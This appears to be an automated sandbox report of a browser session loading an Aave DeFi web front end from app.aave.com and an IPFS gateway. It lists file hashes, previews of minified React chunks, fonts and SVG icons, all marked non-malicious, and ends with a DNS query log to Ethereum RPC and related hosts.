                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1811],{81811:function(e,t,r){r.r(t),r.d(t,{RepayModal:function(){return Ae}});var n=r(59499),a=r(49501),o=r(67294),s=r(47130),i=r(46839),l=r(8195),u=r(46930),c=r(63206),d=r(31959),p=r(94635),m=r(75331),y=r(1279),b=r(52358),f=r(30120),v=r(81645),x=r(29630),h=r(9144),g=r(70794),A=r(25935),S=r(41024),j=r(72667),T=r(74119),w=r(50029),O=r(87794),C=r.n(O),k=r(25808),E=r(77537),P=r(20301),R=r(68448),D=r(53601),B=r(93608),L=r(57824),N=r(94671),I=r(99730),U=r(17674),W=r(4730),Z=r(80854),_=r(21732),M=r(78371),F=r(67489),Y=r(85893),H=["repayAmount","poolReserve","fromAssetData","isWrongNetwork","sx","symbol","rateMode","repayAllDebt","useFlashLoan","blocked","loading","repayWithAmount","buildTxFn"];function V(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function q(
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4686), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):4686
                                                                                                                                                                                                                                                  Entropy (8bit):5.06794409717879
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:sDmAXyeGteFczN6XddIVEQEcXkEbES0uyY4XvrkXH5WXWvmADjXxaNpXAXoA6YVU:rkZioSYKhvUh1N
                                                                                                                                                                                                                                                  MD5:C8E16A308589793B691E74FDDABD6B8F
                                                                                                                                                                                                                                                  SHA1:1A19589D5697F3BA841CC6333956994641FD3E21
                                                                                                                                                                                                                                                  SHA-256:92AC60B8AF9746D7879D1F83134F29B01AFFE1A17CBA1ED26AA9C2E085529AE7
                                                                                                                                                                                                                                                  SHA-512:84BD84090B33C6A01D443E55486106E0F57ED23E8581EAC6BA7E009B0E19982782FCF7E1A9F30EFF105F946B6F45476DE7702DF2D190609B9B7625857B9616D9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/css/0da2d62e1a58e826.css
                                                                                                                                                                                                                                                  Preview:@font-face{font-family:Inter;font-style:normal;font-weight:100;font-display:swap;src:url(/_next/static/media/Inter-Thin.dafaa44d.woff2) format("woff2"),url(/_next/static/media/Inter-Thin.16325d9b.woff) format("woff")}@font-face{font-family:Inter;font-style:italic;font-weight:100;font-display:swap;src:url(/_next/static/media/Inter-ThinItalic.4fc662b3.woff2) format("woff2"),url(/_next/static/media/Inter-ThinItalic.d3d89947.woff) format("woff")}@font-face{font-family:Inter;font-style:normal;font-weight:200;font-display:swap;src:url(/_next/static/media/Inter-ExtraLight.6824177d.woff2) format("woff2"),url(/_next/static/media/Inter-ExtraLight.15c082a5.woff) format("woff")}@font-face{font-family:Inter;font-style:italic;font-weight:200;font-display:swap;src:url(/_next/static/media/Inter-ExtraLightItalic.05138ddd.woff2) format("woff2"),url(/_next/static/media/Inter-ExtraLightItalic.3beee54f.woff) format("woff")}@font-face{font-family:Inter;font-style:normal;font-weight:300;font-display:swap;src
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 105924, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):105924
                                                                                                                                                                                                                                                  Entropy (8bit):7.99656515123012
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:3072:7Jk35GDAni+UzuVEjLH8MSP02J5E4ZjJffp:7ys0iIEjz8MNGRfp
                                                                                                                                                                                                                                                  MD5:75DB5319E7E87C587019A5DF08D7272C
                                                                                                                                                                                                                                                  SHA1:92B30527304B5DC80F45E997E0B1AC4C70110A18
                                                                                                                                                                                                                                                  SHA-256:1B498B959E5B7DECBF9185803591D25BC1FBF83E798372ED30D32D5C79D82FF6
                                                                                                                                                                                                                                                  SHA-512:4E556D80B52DDBADDDF9287F6CDAEF0D12113D0FA4A07728FD67767B97806EBA5FA0F82711F71E76EE2875192D7618A9B6C277CEB6D69A30F76CA8E3EBB74AA1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/media/Inter-Medium.dc792b50.woff2
                                                                                                                                                                                                                                                  Preview:wOF2...................e..............................r...J.`.......0.....T..6.$..N. ......-[U4..*...9-.I..J.*h....O .kD3=,(].e.Q.{..Ip...Q..-E~x...^...Y.....g..............7.....7.....$...;....'H...V..0.j...F1..A..H.sL...+..%.j."I...n......c0..1..&.L.%.U.M.)f>A<'.9......Z....+n..)$8...F.)..4..l......a.A.\...2.....c..\....},...Y.i.W.'.x.....y.T......ev$..`G.$m.O"B..k;n...t...N.'r..w..C8.fcb.LJ%j...$i=.I.P2.ns.L..l.."|......j.....8.^.i.....p.*[.i.:...0.E....}4pS<...y.....*.......=..LI%..[5..#n...2o..^..F!.G"...XV^.D......;.@.......#2.m.g.....fq~..u..A.CS..d.c.)R...D.4&..[.$.....U.W.id.+..r...Z&..._....P..)...;..v.9/.a..z......kf>c......_...k..e0Y......eF.8..}K......{.SH ......p.....X...kN.4..".Q......#s...../. ...1..C.....]P+2Pv!d/.,..8.4VNw...q..<A....m.Y...B..".>P{.L._......6H.9...4..l|......Z..e..../^B..}E..o.;......bk7.r..C.v..5.3..Wv..T..#X+Q...0.G.d..j_...<.....s.F.-...<..qq..d......}..i..A...;.Y+.]UU)"..'.9..N.4M.W..?.0.C...d.+.......
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                  Entropy (8bit):4.908001362735867
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:t4KA/YaGdGQzKO8OH8d8mvQ56TpmVVdEC0WpZVvPuJu:0/yEQzrGHvQUQ/G/WVvPau
                                                                                                                                                                                                                                                  MD5:51BB7508DB9048ED6A433DF91ACBE31C
                                                                                                                                                                                                                                                  SHA1:0B0F4FE43A282F6967EF26CEC27D9D39E000A8BD
                                                                                                                                                                                                                                                  SHA-256:A8E257F67B746F310E13D654B2B66EF0B5C99F110F361004EFAA53942A7A92A5
                                                                                                                                                                                                                                                  SHA-512:AE7AAAF33864FE2750696C79EF5B2F3EFB7AACD23028EDC13F925D7872B1E2902F78807F5B0C34C63E3AD554B13F60007ECD267DB7059FE86153705FCA8F4C32
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/tokens/aave.svg
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" data-name="Group 27021" viewBox="0 0 24 24"><defs><linearGradient id="a" x1=".907" x2=".163" y1=".227" y2=".853" gradientUnits="objectBoundingBox"><stop offset="0" stop-color="#b6509e"/><stop offset="1" stop-color="#2ebac6"/></linearGradient></defs><circle cx="12" cy="12" r="12" fill="url(#a)" data-name="Ellipse 991"/><path fill="#fff" d="m17.251 16.78-4.059-9.809a1.091 1.091 0 0 0-1.017-.755h-.359a1.091 1.091 0 0 0-1.017.755l-1.766 4.274H7.697a.731.731 0 0 0-.728.725v.01a.731.731 0 0 0 .728.725h.718L6.73 16.78a.86.86 0 0 0-.05.278.767.767 0 0 0 .2.547.7.7 0 0 0 .539.209.729.729 0 0 0 .419-.139.885.885 0 0 0 .289-.368l1.853-4.601h1.287a.731.731 0 0 0 .728-.725v-.02a.731.731 0 0 0-.728-.725h-.687l1.415-3.529 3.859 9.6a.885.885 0 0 0 .289.368.729.729 0 0 0 .419.139.7.7 0 0 0 .539-.209.767.767 0 0 0 .2-.547.657.657 0 0 0-.05-.278z" data-name="Path 2434"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (45796), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):45796
                                                                                                                                                                                                                                                  Entropy (8bit):5.584146002898277
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:GbemM3hCsH315rbDOniVUMwsSKCzTXjGNiW5PdvUqv98oU7HNfXBU:GQ3hCk31ZWusXjGNiWpdvUqvyu
                                                                                                                                                                                                                                                  MD5:BE66FA90507264B8B852114B1FA37B88
                                                                                                                                                                                                                                                  SHA1:5F09073CC9CAAF14EBED72C216462CBCC171E62B
                                                                                                                                                                                                                                                  SHA-256:678D80EC1689AAB4A646FB49FC0AA2BEB621DEE21D28708309ABBB9CD4263252
                                                                                                                                                                                                                                                  SHA-512:992C77EE1FC3C03071E4F13108A86AA1A288EB4D8D9CB14AB66EB950985C7C025BA8E6D4B90746FAE90855AD3C387EE906977FED11A667B25BEFC27588F304B9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1367],{50020:function(e,t,r){var n=r(59499),o=r(4730),a=r(91655),i=r(30120),s=r(29630),l=(r(67294),r(46839)),c=r(41024),u=r(85893),d=["minVal","maxVal","percentVariant","hyphenVariant"];function p(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function b(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?p(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):p(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}t.Z=function(e){var t=e.minVal,r=e.maxVal,n=e.percentVariant,p=e.hyphenVariant,x=(0,o.Z)(e,d),h=(0,l.HT)(),f=h.ghoLoadingData,v=h.ghoReserveData;if(f)return(0,u.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14192), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):14192
                                                                                                                                                                                                                                                  Entropy (8bit):5.486892248452224
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:OmvgZ4Ybcnri8/C1W7WbafAj4/1LBzVIx:Bg+YomGCz0/9BzV+
                                                                                                                                                                                                                                                  MD5:D564BEBDB37752D4783DD0F7D617163F
                                                                                                                                                                                                                                                  SHA1:C150296E1AA4068BD588541ADB4EF95363FD9EED
                                                                                                                                                                                                                                                  SHA-256:B707DEFEB00A49E6CE1733111BE7D61E6C189CD74A082651D4876C9A5BAE2839
                                                                                                                                                                                                                                                  SHA-512:E84952CA5CDB46EF597072201F73BE54E6B6A32F70EEA54ECF8D5C0F3ABF014AB2580F103AE648D6BE3C00F5BA40F321562FF853DB658B551B052A6405F379EF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1573-73b9595d97d74de8.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1573],{57824:function(e,n,r){r.d(n,{m6:function(){return I},oD:function(){return D},XJ:function(){return C},Bx:function(){return T},JV:function(){return S},aE:function(){return w},jz:function(){return L},Pu:function(){return B}});var t=r(59499),i=r(4730),a=r(49501),o=r(80227),s=r(81645),c=r(30120),l=r(29630),d=r(91655),x=r(22841),u=r(54181),p=r(56371),j=(r(67294),r(44749)),h=r(92391),v=r(29946),f=r(96875),m=r(12349),b=r(41024),g=r(72667),y=r(35643),O=r(85893),A=["description","value","futureValue","numberPrefix","iconSymbol","loading"];function Z(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function P(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?Z(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwn
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):853
                                                                                                                                                                                                                                                  Entropy (8bit):4.793868624189615
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:tJFpu+byoUGSBq1KEVnSsxTKEVADesV/7/ucboDesV:ZaG5Vn5l34T/hboCu
                                                                                                                                                                                                                                                  MD5:B2D8F83525F694A7EB3DA04FE3F8DA65
                                                                                                                                                                                                                                                  SHA1:901B2CEC5B2F25DB3A495E6B000590DBFE40795B
                                                                                                                                                                                                                                                  SHA-256:DB4387BB50E8466CD3E147C0F62C3C434D914465E172C487A40BD2E2C439DC68
                                                                                                                                                                                                                                                  SHA-512:A3E58B3C15A956DE7967CFB67662CDB4FA4A5DAB244CB11758789E70CE491878FB0D18D0CA4B9BEE0735E718C2259198E0F520C51C75CFA06B655FAD95F56E17
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="254" height="254" viewBox="0 0 254 254" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="127" cy="127" r="127" fill="#9391F7" style="fill:color(display-p3 .5765 .5686 .9686);fill-opacity:1"/><path d="M103.39 133.194c10.89-1.768 18.285-12.03 16.518-22.92-1.768-10.89-12.03-18.285-22.92-16.518-10.89 1.768-18.285 12.029-16.518 22.92 1.768 10.89 12.03 18.285 22.92 16.518Zm52.213 0c10.89-1.768 18.285-12.03 16.517-22.92-1.767-10.89-12.029-18.285-22.919-16.518-10.89 1.768-18.286 12.029-16.518 22.92 1.768 10.89 12.029 18.285 22.92 16.518Z" fill="#fff" style="fill:#fff;fill-opacity:1"/><path d="M126.262 31.012c-54.241 0-98.218 44.814-98.203 100.077h25.088c0-41.415 32.475-74.994 73.115-74.994 40.64 0 73.116 33.579 73.116 74.994h25.088c.009-55.263-43.967-100.077-98.204-100.077Z" fill="#fff" style="fill:#fff;fill-opacity:1"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (37318), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):37318
                                                                                                                                                                                                                                                  Entropy (8bit):5.458466014941654
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:RYG/7RNLxiC0j5WeOpHhqGTpHrcKl+OHA9gDr8M8R+yy9fd8x356:RXLxiC0j5cpHzTpHdDr8M8cyy9l8xY
                                                                                                                                                                                                                                                  MD5:67D71AA110F188D9107648C4A497B6AB
                                                                                                                                                                                                                                                  SHA1:88B8D6738CA51981D687F09C2ABD43DDF231D085
                                                                                                                                                                                                                                                  SHA-256:36887E8CF092BC56DE03645ABB67B610E0908F2A514F6CF90755D2D8ADE52CFF
                                                                                                                                                                                                                                                  SHA-512:595524C8B9D70C634F53692F077E41764E47E28630BA6BCFA9E98BC23863E4185ED44993F9F1C917CE73C0EDE1F93E51CCB925B5C5B29D3124F23C25D1D87CEA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8879],{26814:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return ge}});var i=n(17674),r=n(49501),o=n(75331),s=n(56365),a=n(30120),l=n(29630),c=n(79072),d=n(9144),x=n(75084),u=n(81645),h=n(5151),m=n(56371),p=n(5152),j=n(67294),v=n(59499),f=n(4730),b=n(70918),g=n(90149),k=n(68682),y=n(41024),w=n(68861),Z=n(72667),C=n(58527),A=n(77912),S=n(78371),T=n(85893),P=function(e){var t,n,o,s,c,x,u,h,m,p=e.stakedToken,j=e.icon,v=(0,S.Y)((function(e){return e.currentMarketData})),f="",b=(0,A.I)(v).data;if(b&&Array.isArray(b)){var g=(0,i.Z)(b,4);x=g[0],u=g[1],h=g[2],m=g[3]}"AAVE"==p&&(f=(null===(t=x)||void 0===t?void 0:t.stakeApy)||"0"),"ABPT"==p&&(f=(null===(n=u)||void 0===n?void 0:n.stakeApy)||"0"),"GHO"==p&&(f=(null===(o=h)||void 0===o?void 0:o.stakeApy)||"0"),"ABPT V2"==p&&(f=(null===(s=m)||void 0===s?void 0:s.stakeApy)||"0");var P=Date.now()/1e3>Number(null===(c=h)||void 0===c?void 0:c.distributionEnd);return(0,T.jsxs)(a.Z
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11336), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11336
                                                                                                                                                                                                                                                  Entropy (8bit):5.323901341605146
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:es43RJtGlxc5KmsckCNjNk6ZkXFX+nrhwx0iFY1YlnG00e6e1cw:Q3R2S5K7OjNk6eFunrSX+m10e6Pw
                                                                                                                                                                                                                                                  MD5:91FCCEFC49CB6B6072426A010C0E7B76
                                                                                                                                                                                                                                                  SHA1:E45150F2500BCF4DBE419A20E825797A6D10C3F7
                                                                                                                                                                                                                                                  SHA-256:9DFDF112A3462C103A1124E0EB4D31671E97694BC9CA26789FDAFB05AD86E816
                                                                                                                                                                                                                                                  SHA-512:CD718675728C6177B0CFA75ABAFB216530BA019937BC3CA4833E86647A32728CC7BFDC4FA5331967056A79B142AED805C221F6C4EC2CA403F6BD0BD8B6EA1D66
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5315],{12349:function(e,n,t){t.d(n,{M:function(){return v}});var r=t(1279),i=t(80059),o=t(30120),c=t(29630),s=t(81645),a=t(67294),l=t(78371),d=t(57609),p=t(97563),x=t(41024),u=t(72667),f=t(49501),j=t(92391),y=t(85893),b=function(e){var n=e.incentives,t=e.incentivesNetAPR,r=e.symbol,i="secondary12",s=function(e){var n=e.incentiveAPR;return(0,y.jsx)(o.Z,{sx:{display:"inline-flex",alignItems:"center"},children:"Infinity"!==n?(0,y.jsxs)(y.Fragment,{children:[(0,y.jsx)(x.B,{value:+n,percent:!0,variant:i}),(0,y.jsx)(c.Z,{variant:i,sx:{ml:1},children:(0,y.jsx)(f.cC,{id:"APR"})})]}):(0,y.jsxs)(y.Fragment,{children:[(0,y.jsx)(c.Z,{variant:i,children:"\u221e %"}),(0,y.jsx)(c.Z,{variant:i,sx:{ml:1},children:(0,y.jsx)(f.cC,{id:"APR"})})]})})};return(0,y.jsxs)(o.Z,{sx:{display:"flex",justifyContent:"center",alignItems:"center",flexDirection:"column"},children:[(0,y.jsx)(c.Z,{variant:"caption",color:"text.secondary",mb:3,children:
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4254), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):4254
                                                                                                                                                                                                                                                  Entropy (8bit):5.567365538036847
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ib71BNSelDmQUwohXsE1s4ZxrK/ZKvQQnuF9FU5CspIulDVy0ZpoIScHFB1P8DUr:0SelSJwS5M/ZKj95DptokoA07wgjVe5n
                                                                                                                                                                                                                                                  MD5:D89E32DA8C25A7900998E9F78A477C62
                                                                                                                                                                                                                                                  SHA1:04B350CA6D25526A95BDBF6F067FD091FCD451B2
                                                                                                                                                                                                                                                  SHA-256:4A90B901C48DBA63AE44E5541F49704B21B3D5DE6EA1611EA6F4F8150BEDFA6C
                                                                                                                                                                                                                                                  SHA-512:EDD59CD9E2115E18BE5BEAE59B39DE208D9810457125D080468F2056652F67FBB244F40E450DD9174A7DB04F9A790C73980C21A4C9FDF4B7300BDB698B21BD51
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8345.c21c07eb7538546d.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8345],{58345:function(e,t,n){n.r(t),n.d(t,{StakeRewardClaimRestakeModal:function(){return U}});var r=n(67294),o=n(8195),a=n(31959),s=n(49501),i=n(75331),c=n(1279),l=n(29630),u=n(54401),d=n(77912),m=n(60265),v=n(77537),k=n(78371),p=n(84568),x=n(63206),b=n(53601),f=n(63491),j=n(67916),N=n(93608),g=n(57824),y=n(78944),O=n(10343),A=n(59499),h=n(50029),w=n(4730),T=n(87794),C=n.n(T),E=n(89291),S=n(67489),R=n(85893),P=["amountToClaim","isWrongNetwork","sx","symbol","blocked","selectedToken"];function _(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}var I,D=function(e){var t=e.amountToClaim,n=e.isWrongNetwork,r=e.sx,o=e.symbol,a=e.blocked,c=e.selectedToken,l=(0,w.Z)(e,P),u=(0,k.Y)((function(e){return e.claimRewardsAndStake})),d=(0,E.Q)({tryPermit:!1,handleGetTxns:
                                                                                                                                                                                                                                                  No static file info
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:37.019300938 CEST192.168.2.51.1.1.10xf3d1Standard query (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:37.019465923 CEST192.168.2.51.1.1.10xe88aStandard query (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:39.517101049 CEST192.168.2.51.1.1.10x86a6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:39.517672062 CEST192.168.2.51.1.1.10xd93bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:41.580140114 CEST192.168.2.51.1.1.10x9ab9Standard query (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:41.580403090 CEST192.168.2.51.1.1.10xce87Standard query (0)bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:57.647286892 CEST192.168.2.51.1.1.10xa6b5Standard query (0)api.thegraph.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:57.647408962 CEST192.168.2.51.1.1.10x1b97Standard query (0)api.thegraph.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:58.912441015 CEST192.168.2.51.1.1.10xd26eStandard query (0)eth-mainnet.rpc.grove.cityA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:11:58.912961960 CEST192.168.2.51.1.1.10x6f82Standard query (0)eth-mainnet.rpc.grove.city65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.117345095 CEST192.168.2.51.1.1.10xc6d5Standard query (0)eth-mainnet.rpc.grove.cityA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.117856979 CEST192.168.2.51.1.1.10xee48Standard query (0)eth-mainnet.rpc.grove.city65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.161732912 CEST192.168.2.51.1.1.10xbdf7Standard query (0)rpc.ankr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:00.162111044 CEST192.168.2.51.1.1.10xf0d9Standard query (0)rpc.ankr.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.840681076 CEST192.168.2.51.1.1.10x4583Standard query (0)rpc.flashbots.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.845529079 CEST192.168.2.51.1.1.10xde4dStandard query (0)rpc.flashbots.net65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.848819971 CEST192.168.2.51.1.1.10xe075Standard query (0)rpc.ankr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:02.849195004 CEST192.168.2.51.1.1.10x17b7Standard query (0)rpc.ankr.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.134548903 CEST192.168.2.51.1.1.10x8c04Standard query (0)app.aave.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.134982109 CEST192.168.2.51.1.1.10xc77eStandard query (0)app.aave.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.236682892 CEST192.168.2.51.1.1.10x53ebStandard query (0)eth-mainnet.public.blastapi.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.237217903 CEST192.168.2.51.1.1.10xb376Standard query (0)eth-mainnet.public.blastapi.io65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.242254019 CEST192.168.2.51.1.1.10xc57aStandard query (0)rpc.flashbots.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.242422104 CEST192.168.2.51.1.1.10x9b8dStandard query (0)rpc.flashbots.net65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.917021036 CEST192.168.2.51.1.1.10xb805Standard query (0)docs.flashbots.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:04.917251110 CEST192.168.2.51.1.1.10xc42Standard query (0)docs.flashbots.net65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.514698982 CEST192.168.2.51.1.1.10x6f0eStandard query (0)cloudflare-eth.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.514844894 CEST192.168.2.51.1.1.10xfdf4Standard query (0)cloudflare-eth.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.517426968 CEST192.168.2.51.1.1.10x3a37Standard query (0)eth-mainnet.public.blastapi.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:05.517426968 CEST192.168.2.51.1.1.10xced0Standard query (0)eth-mainnet.public.blastapi.io65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:06.635766983 CEST192.168.2.51.1.1.10xd807Standard query (0)app.aave.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:06.636230946 CEST192.168.2.51.1.1.10x5150Standard query (0)app.aave.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.154772997 CEST192.168.2.51.1.1.10x3d6fStandard query (0)cloudflare-eth.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Sep 28, 2024 06:12:07.156028032 CEST192.168.2.51.1.1.10x6c11Standard query (0)cloudflare-eth.com65IN (0x0001)false
